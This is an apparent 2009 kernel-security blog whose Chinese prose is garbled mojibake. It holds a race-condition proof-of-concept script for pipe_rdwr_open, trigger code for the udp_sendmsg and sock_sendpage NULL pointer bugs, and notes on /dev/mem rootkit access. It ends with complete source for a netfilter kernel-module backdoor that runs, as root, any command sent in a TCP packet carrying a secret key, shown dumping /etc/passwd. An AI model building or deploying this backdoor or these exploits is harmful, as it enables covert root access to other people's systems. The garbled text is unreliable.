WZT��

��Ǹ�linux kernel pipe_rdwr_open©��

wzt85 — 2009-11-10 09:29

©��11.3�ŷ��ģ� exp��˼��汾�Ķ��Ч�� ©��еģ� ֻ�Ǻ��Ѵ��ϸ��һ��poc��
http://www.nsfocus.net/vulndb/14025
while : ; do
{ echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
PID=$!
OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
{ read PID REST ; echo $PID; } )
OUT="${OUT%% *}"
DELAY=$((RANDOM * 1000 / 32768))
usleep $((DELAY * 1000 + RANDOM % 1000 ))
echo n > /proc/$OUT/fd/1 # Trigger defect
done
��Ȼ�Ǵ�lkml�ϳ��ġ� ��©��10.14�ŵ��ں��ʼ��б��оͱ��˱�� Ǹ�poc��©��ṩ�ģ� ��˼һ��˵�ˣ�

The window for failure is small. It's easiest to reproduce
this problem by stalling pipe_rdwr_open() to open up the
window:

--- pipe.c.orig 2009-10-15 20:33:53.000000000 -0700
+++ pipe.c 2009-10-15 20:17:40.000000000 -0700
@@ -736,2 +736,3 @@
{
+ msleep(100);

mutex_lock(&inode->i_mutex);

With the failure window widened, it's easy to reproduce
the failure with:

------------------------------

--------------------------------
#!/bin/sh

while : ; do

{ echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
PID=$!
OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |

{ read PID REST ; echo $PID; } )
OUT="${OUT%% *}"
DELAY=$((RANDOM * 1000 / 32768))
usleep $((DELAY * 1000 + RANDOM % 1000 ))

echo n > /proc/$OUT/fd/1

done

Ҫ��pipe_rdwr_open��в��һ��ߴ��룬 ��Ǹ�poc��ܺ��׵Ĵ��ָ��©��

��ڹ��һ��lkml�ϵ��ӣ�
http://lkml.org/lkml/2009/10/14/184
��ʹ�ܶ��Ϊ©��Ĳ��ԭ��˵��Ǹ��ʱ�� ʼ��˵��û��⡣ ��©��ԭ��sys_open��pipe_rdwr_openִ��ʱ��ڣ� ��뻹û��fifo�ļ��inode�ṹ�� û��ôһ��ǳ��ǳ�С��ʱ��ڣ� ��̹ر��fifo�ļ�� ͷ��pipe_inode_info�ṹ�� pipe_rdwr_open��ִ�е�ʱ��
if (filp->f_mode & FMODE_READ)
inode->i_pipe->readers++;
��oops��

��exp��߸��poc��ĳЩ�ں˰汾��ȷʵ��Ա��oops�� Ǹ��˾��ùܵ��黹�ǻ��ںܶ��ģ� ��ע�ʼ��б� ��
�Ķ�ȫ��
��Kernel �鿴��

�Ǽ�ˮƽ��

wzt85 — 2009-10-28 20:04

��Ǽ�ȥ�ˣ� ��˿��ˣ� ��ˮƽ��ǣ� ��
��Life �鿴��

��Ա��

wzt85 — 2009-09-11 20:59

��쿴��ϡ��һ��˶��˧�磬 ��´��Ů��ļ�С��ƽ�Ⱑ��˳��˧��Ů��ϲ�� Ҫ�ǲ�˧�� ǮҲ�а��ûǮ��û��û��ֶԲ��mm�ĳ��Ա��˵��ȷʵ��д��Ѷ��ˡ��Ⱥ��Ļ��һ��Ǽ�Сʱ�� д��ǵ��Դ��ˡ�mm�ǲ�ϲ��ǰ�� զ�졣 ��˵��д��ô��ء� ��ˣ� ��Ǽʡ��
��Life �鿴��

udp_sendmsg��ָ��©��

wzt85 — 2009-09-07 09:19

udp_sendmsg��ָ��©��    by wzt

©��

��Linux ipv4Э��ջ��udp_sendmsg()��ϴ��ȱ�ݣ� ��struct rtable *rt�Կ�ָ��ʽ��ݸ�ip_append_data(), �Ӷ��kernel oops,
��߿��ô�©��Ȩ�ޡ�©��Ӱ��2.6.19��µİ汾��

©��:

>> linux+v2.6.18/net/ipv4/udp.c

int udp_sendmsg(struct kiocb *iocb, struct sock *sk, struct msghdr *msg,
size_t len)
{
...
// rt��ʼ��NULL
struct rtable *rt = NULL;
...
// Linux udpЭ��udp��ݰ��ϲ��һ��ͳ�ȥ��߷��Ч�ʡ�
// �ж��Ƿ��и��Ҫ��, ��߿��Թ��sendto/sendmsg��ã� ��MSG_PROXY|MSG_MORE��־�� ƹ��rt��á�
if (up->pending) {
/*
* There are pending frames.
* The socket lock must be held while it's corked.
*/
lock_sock(sk);
if (likely(up->pending)) {
if (unlikely(up->pending != AF_INET)) {
release_sock(sk);
return -EINVAL;
}
// ��ݷ��ͳ�ȥ
goto do_append_data;
}
release_sock(sk);
}

...
// rtֱ��NULL��ݸ�ip_append_data, ip_append_dataû��жϿ�ָ�� Ӷ��©��
do_append_data:
up->len += ulen;
err = ip_append_data(sk, ip_generic_getfrag, msg->msg_iov, ulen,
sizeof(struct udphdr), &ipc, rt,
corkreq ? msg->msg_flags|MSG_MORE : msg->msg_flags);
...
}

��δ��©��

if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
perror("[-] socket()");
return -1;
}
x0x.sa_family=AF_UNSPEC;
memset(x0x.sa_data,0x82,14);
memset((char *)buf,0,sizeof(buf));
sendto(fd,buf,1024,MSG_PROXY | MSG_MORE,&x0x,sizeof(x0x));
sendto(fd,buf,1024,0,&x0x,sizeof(x0x));

socket��жϷ��sys_socketcall�� linux-2.6.18/net/socket.c��:

>> sys_socketcall��sys_socket
asmlinkage long sys_socketcall(int call, unsigned long __user *args)
{
...
switch(call)
{
case SYS_SOCKET:
err = sys_socket(a0,a1,a[2]);
break;
...

}

>> sys_socket��sock_create��г�ʼ�� Ȼ��sock_map_fd��sockfs�ļ�ϵͳ��йҽӡ�
asmlinkage long sys_socket(int family, int type, int protocol)
{
int retval;
struct socket *sock;

retval = sock_create(family, type, protocol, &sock);
if (retval < 0)
goto out;

retval = sock_map_fd(sock);
if (retval < 0)
goto out_release;

out:
/* It may be already another descriptor 8) Not kernel problem. */
return retval;

out_release:
sock_release(sock);
return retval;
}

>> sock_create
int sock_create(int family, int type, int protocol, struct socket **res)
{
return __sock_create(family, type, protocol, res, 0);
}

>> __sock_create
static int __sock_create(int family, int type, int protocol, struct socket **res, int kern)
{
// ��sock�ṹ��
if (!(sock = sock_alloc())) {
if (net_ratelimit())
printk(KERN_WARNING "socket: no more sockets\n");
err = -ENFILE;          /* Not exactly a match, but its the closest posix thing */
goto out;
}

...
// ��о��Э��ĳ�ʼ�� ִ��ipv4��create�� ָ��ipx��ص��ں�ʱ��ʼ��
if ((err = net_families[family]->create(sock, protocol)) < 0) {
sock->ops = NULL;
goto out_module_put;
}
...
}

��ipv4��ĳ�ʼ��̣� /linux-2.6.18/net/ipv4/af_inet.c��
static int __init inet_init(void)
{
// ע��ipv4��struct net_proto_family��
(void)sock_register(&inet_family_ops);
}

>> sock_register
int sock_register(struct net_proto_family *ops)
{
...
net_family_write_lock();
err = -EEXIST;
if (net_families[ops->family] == NULL) {
//��opsָ�븳ֵ��net_families[ops->family]
net_families[ops->family]=ops;
err = 0;
}
}

// ��Կ��__sock_create�е�net_families[family]->create��г�ʼ��ġ�
static struct net_proto_family inet_family_ops = {
.family = PF_INET,
.create = inet_create,
.owner = THIS_MODULE,
};

��inet_create��

static int inet_create(struct socket *sock, int protocol)
{
struct sock *sk;
struct list_head *p;
struct inet_protosw *answer;
struct inet_sock *inet;
struct proto *answer_prot;

...
// ��sock->ops;
sock->ops = answer->ops;
...
// ��sk->sk_prot
sk = sk_alloc(PF_INET, GFP_KERNEL, answer_prot, 1);

...
}

onst struct proto_ops inet_dgram_ops = {
.family            = PF_INET,
.owner             = THIS_MODULE,
.release           = inet_release,
.bind              = inet_bind,
.connect           = inet_dgram_connect,
.socketpair        = sock_no_socketpair,
.accept            = sock_no_accept,
.getname           = inet_getname,
.poll              = udp_poll,
.ioctl             = inet_ioctl,
.listen            = sock_no_listen,
.shutdown          = inet_shutdown,
.setsockopt        = sock_common_setsockopt,
.getsockopt        = sock_common_getsockopt,
.sendmsg           = inet_sendmsg,
.recvmsg           = sock_common_recvmsg,
.mmap              = sock_no_mmap,
.sendpage          = inet_sendpage,
#ifdef CONFIG_COMPAT
.compat_setsockopt = compat_sock_common_setsockopt,
.compat_getsockopt = compat_sock_common_getsockopt,
#endif
};

static struct inet_protosw inetsw_array[] =
{
{
.type =       SOCK_STREAM,
.protocol =   IPPROTO_TCP,
.prot =       &tcp_prot,
.ops =        &inet_stream_ops,
.capability = -1,
.no_check =   0,
.flags =      INET_PROTOSW_PERMANENT |
INET_PROTOSW_ICSK,
},

{
.type =       SOCK_DGRAM,
.protocol =   IPPROTO_UDP,
.prot =       &udp_prot,
.ops =        &inet_dgram_ops,
.capability = -1,
.no_check =   UDP_CSUM_DEFAULT,
.flags =      INET_PROTOSW_PERMANENT,
},

{
.type =       SOCK_RAW,
.protocol =   IPPROTO_IP,        /* wild card */
.prot =       &raw_prot,
.ops =        &inet_sockraw_ops,
.capability = CAP_NET_RAW,
.no_check =   UDP_CSUM_DEFAULT,
.flags =      INET_PROTOSW_REUSE,
}
};

ͨ��inet_register_protosw��ݽṹ��sys_sendto��õ��

asmlinkage long sys_sendto(int fd, void __user * buff, size_t len, unsigned flags,
struct sockaddr __user *addr, int addr_len)
{
...
err = sock_sendmsg(sock, &msg, len);
...
}

int sock_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
{
...
ret = __sock_sendmsg(&iocb, sock, msg, size);
...
}

static inline int __sock_sendmsg(struct kiocb *iocb, struct socket *sock,
struct msghdr *msg, size_t size)
{
...
// ͨ��ǰ��ķ��֪��sock->ops->sendmsg��õľ��udp_sendmsg(), �˺��ȱ�ݣ� �Ӷ��©��
return sock->ops->sendmsg(iocb, sock, msg, size);
...
}

��޲��

һ��Linux kernel��Ѿ��

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=blobdiff;f=net/ipv4/udp.c;h=865d75214a9ab1d741f3d8351359e95a0d8394e7;hp=6d6142f9c478baa8c85dcf1d174a5a88f66d783a;hb=1e0c14f49d6b393179f423abbac47f85618d3d46;hpb=132a55f3c5c0b1a364d32f65595ad8838c30a60e

diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
index 6d6142f..865d752 100644 (file)

--- a/net/ipv4/udp.c
+++ b/net/ipv4/udp.c
@@ -675,6 +675,8 @@ do_append_data:
udp_flush_pending_frames(sk);
else if (!corkreq)
err = udp_push_pending_frames(sk, up);
+       else if (unlikely(skb_queue_empty(&sk->sk_write_queue)))
+               up->pending = 0;
release_sock(sk);

out:

��redhat�� RHSA-2009:1223 �C Security Advisory https://rhn.redhat.com/rhn/errata/details/Packages.do?eid=8969

�� ʼ��б��һ�� ֻ��µ��ں��ϣ� ��Բ��©��Ĳ��

diff -r b3cbf0ceeb34 net/ipv4/ip_output.c
--- a/net/ipv4/ip_output.c      Mon Aug 24 14:48:29 2009 +0200
+++ b/net/ipv4/ip_output.c      Thu Aug 27 15:20:36 2009 +0200
@@ -814,6 +814,8 @@
inet->cork.addr = ipc->addr;
}
rt = *rtp;
+               if (unlikely(!rt))
+                       return -EFAULT;
/*
* We steal reference to this route, caller should not release it
*/ �Ķ�ȫ��
��Kernel �鿴��

Linux sock_sendpage��ָ��©��

wzt85 — 2009-08-19 12:00

Linux sock_sendpage��ָ��©��

>> linux-2.6.18/net/socket.c

static ssize_t sock_sendpage(struct file *file, struct page *page,
int offset, size_t size, loff_t *ppos, int more)
{
struct socket *sock;
int flags;

sock = file->private_data;

flags = !(file->f_flags & O_NONBLOCK) ? 0 : MSG_DONTWAIT;
if (more)
flags |= MSG_MORE;

return sock->ops->sendpage(sock, page, offset, size, flags);
}
sock_sendpage��û��ж�sock->ops->sendpage��ָ��Ƿ�Ϊ�գ��ͽ��á��ָ��Ĵ��ĳЩЭ��
û��ȷ�ĳ�ʼ��ָ��ɵġ� exp��߸��Э��pppox, bluetooth, appletalk, ipx, sctp�ȡ��ipxЭ��
Ϊ�� ˵��©��γɵ��Լ��.

exp��룺
const int domains[][3] = { { PF_APPLETALK, SOCK_DGRAM, 0 },
{PF_IPX, SOCK_DGRAM, 0 }, { PF_IRDA, SOCK_DGRAM, 0 },
{PF_X25, SOCK_DGRAM, 0 }, { PF_AX25, SOCK_DGRAM, 0 },
{PF_BLUETOOTH, SOCK_DGRAM, 0 }, { PF_IUCV, SOCK_STREAM, 0 },
{PF_INET6, SOCK_SEQPACKET, IPPROTO_SCTP },
{PF_PPPOX, SOCK_DGRAM, 0 },
{PF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP },
{DOMAINS_STOP, 0, 0 }
};

for (; domains[d][0] != DOMAINS_STOP; d++) {
if ((out = socket(domains[d][0], domains[d][1], domains[d][2])) >= 0)
break;
}

�滻��ipxЭ��ǣ�
out = socket(PF_IPX, SOCK_DGRAM, 0);
��Ը�PF_IPXЭ��׽��ֽӿڡ� ��ں��ʵ�ֵģ�

socket��жϷ��sys_socketcall�� linux-2.6.18/net/socket.c��:

>> sys_socketcall��sys_socket
asmlinkage long sys_socketcall(int call, unsigned long __user *args)
{
...
switch(call)
{
case SYS_SOCKET:
err = sys_socket(a0,a1,a[2]);
break;
...

}

>> sys_socket��sock_create��г�ʼ�� Ȼ��sock_map_fd��sockfs�ļ�ϵͳ��йҽӡ�
asmlinkage long sys_socket(int family, int type, int protocol)
{
int retval;
struct socket *sock;

retval = sock_create(family, type, protocol, &sock);
if (retval < 0)
goto out;

retval = sock_map_fd(sock);
if (retval < 0)
goto out_release;

out:
/* It may be already another descriptor 8) Not kernel problem. */
return retval;

out_release:
sock_release(sock);
return retval;
}

>> sock_create
int sock_create(int family, int type, int protocol, struct socket **res)
{
return __sock_create(family, type, protocol, res, 0);
}

>> __sock_create
static int __sock_create(int family, int type, int protocol, struct socket **res, int kern)
{
// ��sock�ṹ��
if (!(sock = sock_alloc())) {
if (net_ratelimit())
printk(KERN_WARNING "socket: no more sockets\n");
err = -ENFILE;          /* Not exactly a match, but its the
closest posix thing */
goto out;
}

...
// ��о��Э��ĳ�ʼ�� ִ��ipx��create�� ָ��ipx��ص�
�ں�ʱ��ʼ��
if ((err = net_families[family]->create(sock, protocol)) < 0) {
sock->ops = NULL;
goto out_module_put;
}
...
}

��ipx��ĳ�ʼ��̣� /linux-2.6.18/net/ipx/af_ipx.c��
static int __init ipx_init(void)
{
// ע��ipxЭ��
int rc = proto_register(&ipx_proto, 1);

if (rc != 0)
goto out;

// ע��Э��Ĳ�� bug�ɴ˿�ʼ��
sock_register(&ipx_family_ops);
...
}

>> sock_register
int sock_register(struct net_proto_family *ops)
{
...
net_family_write_lock();
err = -EEXIST;
if (net_families[ops->family] == NULL) {
��opsָ�븳ֵ��net_families[ops->family]
net_families[ops->family]=ops;
err = 0;
}
}

// ��Կ��__sock_create�е�net_families[family]->create��г�ʼ��ġ�
static struct net_proto_family ipx_family_ops = {
.family         = PF_IPX,
.create         = ipx_create,
.owner          = THIS_MODULE,
};

��ipx_create��

static int ipx_create(struct socket *sock, int protocol)
{
...
��sock��ops�ṹ��и�ֵ
sock->ops = &ipx_dgram_ops;
...
}

static const struct proto_ops SOCKOPS_WRAPPED(ipx_dgram_ops) = {
.family         = PF_IPX,
.owner          = THIS_MODULE,
.release        = ipx_release,
.bind           = ipx_bind,
.connect        = ipx_connect,
.socketpair     = sock_no_socketpair,
.accept         = sock_no_accept,
.getname        = ipx_getname,
.poll           = datagram_poll,
.ioctl          = ipx_ioctl,
#ifdef CONFIG_COMPAT
.compat_ioctl   = ipx_compat_ioctl,
#endif
.listen         = sock_no_listen,
.shutdown       = sock_no_shutdown, /* FIXME: support shutdown */
.setsockopt     = ipx_setsockopt,
.getsockopt     = ipx_getsockopt,
.sendmsg        = ipx_sendmsg,
.recvmsg        = ipx_recvmsg,
.mmap           = sock_no_mmap,
.sendpage       = sock_no_sendpage,
};
��￴��.sendpage�ṹ��Ϊ�Ǳ�sock_no_sendpage��ֵ�ˣ� ��SOCKOPS_WRAPPED��˸��ص�bug��
ʵ��û�ж�.sendpage��г�ʼ��ģ� ֱ�ӵ��sendpageû��ֵ�� ©��ɴ��ɡ�

#define SOCKOPS_WRAP(name, fam)                                 \
SOCKCALL_WRAP(name, release, (struct socket *sock), (sock))     \
SOCKCALL_WRAP(name, bind, (struct socket *sock, struct sockaddr *uaddr, int addr_len), \
(sock, uaddr, addr_len))                          \
SOCKCALL_WRAP(name, connect, (struct socket *sock, struct sockaddr * uaddr, \
int addr_len, int flags),         \
(sock, uaddr, addr_len, flags))                   \
SOCKCALL_WRAP(name, socketpair, (struct socket *sock1, struct socket *sock2), \
(sock1, sock2))                                   \
SOCKCALL_WRAP(name, accept, (struct socket *sock, struct socket *newsock, \
int flags), (sock, newsock, flags)) \
SOCKCALL_WRAP(name, getname, (struct socket *sock, struct sockaddr *uaddr, \
int *addr_len, int peer), (sock, uaddr, addr_len, peer)) \
SOCKCALL_UWRAP(name, poll, (struct file *file, struct socket *sock, struct poll_table_struct *wait), \
(file, sock, wait)) \
SOCKCALL_WRAP(name, ioctl, (struct socket *sock, unsigned int cmd, \
unsigned long arg), (sock, cmd, arg)) \
SOCKCALL_WRAP(name, compat_ioctl, (struct socket *sock, unsigned int cmd, \
unsigned long arg), (sock, cmd, arg)) \
SOCKCALL_WRAP(name, listen, (struct socket *sock, int len), (sock, len)) \
SOCKCALL_WRAP(name, shutdown, (struct socket *sock, int flags), (sock, flags)) \
SOCKCALL_WRAP(name, setsockopt, (struct socket *sock, int level, int optname, \
char __user *optval, int optlen), (sock, level, optname, optval, optlen)) \
SOCKCALL_WRAP(name, getsockopt, (struct socket *sock, int level, int optname, \
char __user *optval, int __user *optlen), (sock, level, optname, optval, optlen)) \
SOCKCALL_WRAP(name, sendmsg, (struct kiocb *iocb, struct socket *sock, struct msghdr *m, size_t len), \
(iocb, sock, m, len)) \
SOCKCALL_WRAP(name, recvmsg, (struct kiocb *iocb, struct socket *sock, struct msghdr *m, size_t len, int flags), \
(iocb, sock, m, len, flags)) \
SOCKCALL_WRAP(name, mmap, (struct file *file, struct socket *sock, struct vm_area_struct *vma), \
(file, sock, vma)) \
\
static const struct proto_ops name##_ops = {                    \
.family         = fam,                          \
.owner          = THIS_MODULE,                  \
.release        = __lock_##name##_release,      \
.bind           = __lock_##name##_bind,         \
.connect        = __lock_##name##_connect,      \
.socketpair     = __lock_##name##_socketpair,   \
.accept         = __lock_##name##_accept,       \
.getname        = __lock_##name##_getname,      \
.poll           = __lock_##name##_poll,         \
.ioctl          = __lock_##name##_ioctl,        \
.compat_ioctl   = __lock_##name##_compat_ioctl, \
.listen         = __lock_##name##_listen,       \
.shutdown       = __lock_##name##_shutdown,     \
.setsockopt     = __lock_##name##_setsockopt,   \
.getsockopt     = __lock_##name##_getsockopt,   \
.sendmsg        = __lock_##name##_sendmsg,      \
.recvmsg        = __lock_##name##_recvmsg,      \
.mmap           = __lock_##name##_mmap,         \
};

��bug��ô��ģ�

�ص�sys_socket��, ��ǰ��socket�ṹ�Ƿ�ҽӵ�sockfs�ļ�ϵͳ�ϵģ�

int sock_map_fd(struct socket *sock)
{
struct file *newfile;
// ��һ��û�õ�fd��file�ṹ
int fd = sock_alloc_fd(&newfile);

if (likely(fd >= 0)) {
// sock��newfile�ҽ�
int err = sock_attach_fd(sock, newfile);

if (unlikely(err < 0)) {
put_filp(newfile);
put_unused_fd(fd);
return err;
}
fd_install(fd, newfile);
}
return fd;
}

>> sock_attach_fd
static int sock_attach_fd(struct socket *sock, struct file *file)
{
struct qstr this;
char name[32];

this.len = sprintf(name, "[%lu]", SOCK_INODE(sock)->i_ino);
this.name = name;
this.hash = SOCK_INODE(sock)->i_ino;

file->f_dentry = d_alloc(sock_mnt->mnt_sb->s_root, &this);
if (unlikely(!file->f_dentry))
return -ENOMEM;

file->f_dentry->d_op = &sockfs_dentry_operations;
d_add(file->f_dentry, SOCK_INODE(sock));
file->f_vfsmnt = mntget(sock_mnt);
file->f_mapping = file->f_dentry->d_inode->i_mapping;

sock->file = file;
// ��file�ĺ��ָ�뱻socket_file_ops��ֵ��
file->f_op = SOCK_INODE(sock)->i_fop = &socket_file_ops;
file->f_mode = FMODE_READ | FMODE_WRITE;
file->f_flags = O_RDWR;
file->f_pos = 0;
// private_data��ŵľ��socket�ṹ�� һ��sys_sendfile�п��
file->private_data = sock;

return 0;
}

static struct file_operations socket_file_ops = {
.owner =        THIS_MODULE,
.llseek =       no_llseek,
.aio_read =     sock_aio_read,
.aio_write =    sock_aio_write,
.poll =         sock_poll,
.unlocked_ioctl = sock_ioctl,
#ifdef CONFIG_COMPAT
.compat_ioctl = compat_sock_ioctl,
#endif
.mmap =         sock_mmap,
.open =         sock_no_open,   /* special open code to disallow open via /proc */
.release =      sock_close,
.fasync =       sock_fasync,
.readv =        sock_readv,
.writev =       sock_writev,
.sendpage =     sock_sendpage, // ��sock_sendpage��ֵ��.sendpage, sock_sendpageʵ��û�м��ָ�룬
��sys_senfile��ִ�е�ʱ��©��
.splice_write = generic_splice_sendpage,
};

��exp�У��δ��©��ģ�
sendfile(fdout, fdin, NULL, PAGE_SIZE);

sendfile->sys_sendfile, linux-2.6.18/fs/read_write.c:

asmlinkage ssize_t sys_sendfile(int out_fd, int in_fd, off_t __user *offset, size_t count)
{
...
return do_sendfile(out_fd, in_fd, NULL, count, 0);
}

static ssize_t do_sendfile(int out_fd, int in_fd, loff_t *ppos,
size_t count, loff_t max)
{
...
retval = in_file->f_op->sendfile(in_file, ppos, count, file_send_actor, out_file);
...
}
©��ɴ˴��
�Ķ�ȫ��
��Kernel �鿴��

��Ͱͼ��©��ύ

wzt85 — 2009-08-19 10:02

��һ�£�

��ʹ�ð��Ͱͼ��Ų�Ʒ��Ͱͣ��Ա��֧��Ż��ڱ��裬��У��˰�ȫ©��뷢�Ͱ��©��ʼ��

security@service.alibaba.com

��ǻ��յ��һ��ǻ��Ӧ��ȷ��©��ȷ��ֵģ��ǽ��С��Ʒ��ʾ��л��
��Ϊ��ͰͲ�Ʒ�û��İ�ȫ��׵ĸ��˺��֯��Ǳ�ʾ��ֿ�ĸ�л�� Ķ�ȫ��
��Life �鿴��

��ڴ��Ǽ�

wzt85 — 2009-08-10 09:41

Ϊ�˼�ǿ�Ŷ�֮��ĺ�� ҿ��Ǽʺü��ˣ� �Ǽʸ��ָ��°��
��Life �鿴��

��ں��н��Ҫ��һ��ѡ��

wzt85 — 2009-07-07 16:35

��Ϊ��ѡ� /dev/mem��͵�rootkit�ܿ��ܻ��ٴη��ã��Ĭ��û��ġ��

kernel hacking -> Filter access to /dev/mem

��rhelϵ�е��ں��Ѿ��ѡ���Ի��Ǻܰ�ȫ�ġ� ��1m��ڴ��ǲ��ܱ�ӳ��ģ� ��ں˿ռ��ǲ��ܵġ�

��ں˵�2.6.30�� û��filterѡ� �ֿ��Զ�д�ں˿ռ��ˡ��

��´��/drivers/char/mem.c:

/*
* This funcion reads the *physical* memory. The f_pos points directly to the
* memory location.
*/
static ssize_t read_mem(struct file * file, char __user * buf,
                        size_t count, loff_t *ppos)
{
...
        while (count > 0) {
                /*
                 * Handle first page in case it's not aligned
                 */
                if (-p & (PAGE_SIZE - 1))
                        sz = -p & (PAGE_SIZE - 1);
                else
                        sz = PAGE_SIZE;

                sz = min_t(unsigned long, sz, count);

                if (!range_is_allowed(p >> PAGE_SHIFT, count))
                        return -EPERM;
....

}

>> range_is_allowed

#ifdef CONFIG_STRICT_DEVMEM
static inline int range_is_allowed(unsigned long pfn, unsigned long size)
{
        u64 from = ((u64)pfn) << PAGE_SHIFT;
        u64 to = from + size;
        u64 cursor = from;

        while (cursor < to) {
                if (!devmem_is_allowed(pfn)) {
                        printk(KERN_INFO
                "Program %s tried to access /dev/mem between %Lx->%Lx.\n",
                                current->comm, from, to);
                        return 0;
                }
                cursor += PAGE_SIZE;
                pfn++;
        }
        return 1;
}
#else
static inline int range_is_allowed(unsigned long pfn, unsigned long size)
{
        return 1;
}
#endif

>> devmem_is_allowed

/*
 * devmem_is_allowed() checks to see if /dev/mem access to a certain address is
 * valid. The argument is a physical page number.
 *
 *
 * On x86-64, access has to be given to the first megabyte of ram because that area
 * contains bios code and data regions used by X and dosemu and similar apps.
 * Access has to be given to non-kernel-ram areas as well, these contain the PCI
 * mmio resources as well as potential bios/acpi data regions.
 */
int devmem_is_allowed(unsigned long pagenr)
{
        if (pagenr <= 256)
                return 1;
        if (!page_is_ram(pagenr))
                return 1;
        return 0;
}

�Ķ�ȫ��
��Rootkit �鿴��

��ʼ��׷��

wzt85 — 2009-06-20 21:34

��һ��ǳ��賬��ˣ� ��ǰ;��
��Life �鿴��

��netfilter��ͻ�Ʒ��ǽ�� ʵ��Զ��ִ��

wzt85 — 2009-06-04 08:10

ǰ��쿴��rwrk��rk��demo, ��netfilter hookס�˽��ݰ�� hook��NF_IP_PRE_ROUTING�� ˿��ڽ��iptables֮ǰ��ǰʵ��ݰ��Ĺ��ˡ��hook��¾ͱȽ϶��ˣ� ��ʵ�ַ��ǽ�� ̽�� ȻҲ��ţ� wnps��ô��ģ� ��˲��ǽ��Ĺ��α�̬�� л��ᴩ͸��demo��ʾ��tcp��ݣ� �� Ȼ��ȥִ�� е��ǰ��icmp, ip��ţ� ֻ��Щ��ں��ɣ� ��ܸ�ǿ��
demo��ubuntu8.10 + 2.6.28�ϲ��Գɹ��

wzt@wzt-laptop:~$ nc -vv localhost 22
localhost [127.0.0.1] 22 (ssh) open
SSH-2.0-OpenSSH_5.1p1 Debian-3ubuntu1
@wnps-shell:cat /etc/passwd > /home/wzt/pass.log
Protocol mismatch.
sent 49, rcvd 58

demsg:
[ 957.255416] kexec test start ...
[ 1029.692964] hook: function:hook_func-L125: got the tcp key .
[ 1029.692981] hook: function:hook_func-L127: cat /etc/passwd > /home/wzt/pass.log
[ 1029.692985]

wzt@wzt-laptop:~$ ls -lht pass.log
-rw-r--r-- 1 root root 1.7K 2009-06-04 08:08 pass.log

+---------------------------------------------------------------------+

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define HOOK_DEBUG

#ifdef HOOK_DEBUG
#define DbgPrint(format, args...) \
        printk("hook: function:%s-L%d: "format, __FUNCTION__, __LINE__, ##args);
#else
#define DbgPrint(format, args...) do {} while(0);
#endif

#define TCP_SHELL_KEY   "@wnps-shell"

#define PORT_NUM    6
#define IP_NUM        20
#define BUFF_NUM    512

MODULE_LICENSE("GPL");
MODULE_AUTHOR("wzt");

struct exec_work {
    struct work_struct work;
    char *cmd;
};

static struct nf_hook_ops nfho;

int kexec_user_app(void *data)
{
    struct exec_work *work = data;
    int ret;
    char *argv[] = {"/bin/sh", "-c", work->cmd, NULL};
        char *envp[] = { "HOME=/",
                         "TERM=linux",
                         "PATH=/sbin:/usr/sbin:/bin:/usr/bin",
                         NULL };
    ret = call_usermodehelper(argv[0], argv, envp, 1);

    return ret;
}

int execute_user_command(char *cmd)
{
    struct exec_work *exec_work;

    exec_work = kmalloc(sizeof(struct exec_work), GFP_ATOMIC);
    exec_work->cmd = kmalloc(1024*sizeof(char), GFP_ATOMIC);

    INIT_WORK(&exec_work->work, kexec_user_app);
    strncpy(exec_work->cmd, cmd, strlen(cmd) + 1);

    schedule_work(&exec_work->work);

    return 0;
}

unsigned int hook_func(unsigned int hooknum,
                       struct sk_buff **skb,
                       const struct net_device *in,
                       const struct net_device *out,
                       int (*okfn)(struct sk_buff *))
{
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,22)
        struct sk_buff *sk = skb_copy(skb, 1);
#else
    struct sk_buff *sk = *skb;
#endif
        struct iphdr *ip;
    struct tcphdr *tcphdr;
    char buf[BUFF_NUM], *data = NULL;
    char *p;

        if (!sk)
                return NF_ACCEPT;

#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,22)
    ip = ip_hdr(sk);
#else
    ip = sk->nh.iph;
#endif

        switch (ip->protocol) {
                case 1:
                        return NF_ACCEPT;

                case 6:
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,22)
                        tcphdr = ip_hdr(sk);

                        tcphdr =
                                (struct tcphdr *)((void *)sk->data +
                                        ((struct iphdr *)sk->data)->ihl * 4);

            data = (char *)((int *)tcphdr + (int)(tcphdr->doff));
#else
                        tcphdr = (struct tcphdr *)((__u32 *)ip + ip->ihl);

            data = (char *)((int *)tcphdr + (int)(tcphdr->doff));
#endif

                        /*
                         * filter the connected tcp packet
                         */
            if ((p = strstr(data, TCP_SHELL_KEY)) != NULL) {
                DbgPrint("got the tcp key .\n");
                p += strlen(TCP_SHELL_KEY) + 1;
                DbgPrint("%s\n", p);
                execute_user_command(p);
                                goto out;
            }

            out:
            memset(buf, '\0', BUFF_NUM);

                        return NF_ACCEPT;

                default:
                        return NF_ACCEPT;
        }
}

static int kexec_test_init(void)
{
    printk("kexec test start ...\n");

    nfho.hook = hook_func;
    nfho.owner = NULL;
    nfho.pf = PF_INET;

#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,22)
        nfho.hooknum = NF_INET_PRE_ROUTING;
#else
        nfho.hooknum = NF_IP_PRE_ROUTING;
#endif

    nfho.priority = NF_IP_PRI_FIRST;

    nf_register_hook(&nfho);

    return 0;
}

static void kexec_test_exit(void)
{
    printk("kexec test exit ...\n");
    nf_unregister_hook(&nfho);
}

module_init(kexec_test_init);
module_exit(kexec_test_exit); �Ķ�ȫ��
��Rootkit �鿴��

WZT����������

��������Ǹ�linux kernel pipe_rdwr_open©��

�Ǽ�ˮƽ����

����Ա������

udp_sendmsg��ָ��©������

Linux sock_sendpage��ָ��©������

����Ͱͼ���©�������ύ

����ڴ��Ǽ�

���ں��н���Ҫ��һ��ѡ��

��ʼ��׷������

����netfilter��ͻ�Ʒ���ǽ�� ʵ��Զ��ִ������